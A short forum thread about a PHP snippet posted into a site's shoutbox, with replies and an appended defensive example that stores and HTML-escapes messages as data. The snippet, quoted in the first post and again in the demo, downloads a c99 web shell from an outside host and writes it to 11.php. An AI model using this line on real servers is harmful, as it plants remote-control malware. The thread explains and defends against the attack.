Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Frankie Kam on
Number of replies: 2

Here's the code:

<? $z=fopen("11.php",'w');fwrite($z,file_get_contents("http://t00ls.org/c99.txt"));fclose($z); ?> (Tuesday, 10.05.11, 03:47 AM)

 

What was he trying to accomplish?

 

Frankie Kam

In reply to Frankie Kam

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Tim Hunt on

He is trying to download a trojan to your server, so that later he can go to the URL .../11.php to execute malicious stuff. However, that sort of thing will not work, providing you are not using a badly-implemented plugin that has security holes.

In reply to Tim Hunt

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Frankie Kam on

Thanks Tim

Now I know what his intentions are.

This time, I took evasive action. Since I don't know how to stop him from posting such code, I modified the PHP core code of the Shoutbox so that it will replace substring text with blanks. So fopen is replaced with blanks, for example.

Frankie Kam
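
Added example, not part of the thread and not the Shoutbox plugin's own code: a posted message like the one quoted above stays inert when the shoutbox treats it purely as data, storing it in a non-executable data file and HTML-escaping it on output. The function names, the JSON-lines file and the 500-character limit are assumptions made for illustration.

```php
<?php
// Added example: hypothetical shoutbox storage and rendering.
// Messages are data only: stored as JSON lines, escaped on output, and never
// passed to include/require/eval or written to a file the server runs as PHP.

const SHOUT_MAX_LEN = 500; // assumed limit, in characters

function shout_store(string $file, string $user, string $raw): bool
{
    // Reject input that is not valid UTF-8 instead of trying to repair it.
    if (preg_match('//u', $raw) !== 1 || preg_match('//u', $user) !== 1) {
        return false;
    }
    // Drop control characters (tab and newline are kept), then cap the length.
    $text = preg_replace('/[^\P{C}\t\n]/u', '', $raw);
    preg_match('/^.{0,' . SHOUT_MAX_LEN . '}/su', $text, $m);
    $line = json_encode(['t' => time(), 'u' => $user, 'm' => $m[0]]);
    return file_put_contents($file, $line . "\n", FILE_APPEND | LOCK_EX) !== false;
}

function shout_render(string $file): string
{
    $esc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = '';
    $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [];
    foreach ($lines as $line) {
        $row = json_decode($line, true);
        if (!is_array($row)
            || !is_string($row['u'] ?? null)
            || !is_string($row['m'] ?? null)) {
            continue; // skip corrupt or tampered rows
        }
        // Escaping turns "<" into "&lt;", so the browser shows the text as typed.
        $html .= '<li><b>' . $esc($row['u']) . '</b>: ' . $esc($row['m']) . "</li>\n";
    }
    return "<ul>\n" . $html . "</ul>\n";
}

// Constructed demo: the message quoted in the thread, handled as plain text.
$file = sys_get_temp_dir() . '/shoutbox-demo.jsonl'; // hypothetical data file
@unlink($file);
$msg = '<? $z=fopen("11.php",\'w\');'
     . 'fwrite($z,file_get_contents("http://t00ls.org/c99.txt"));fclose($z); ?>';
shout_store($file, 'joker', $msg);
echo shout_render($file);
```

On a real site the data file belongs outside the web root, or in a directory where the server is configured not to execute scripts.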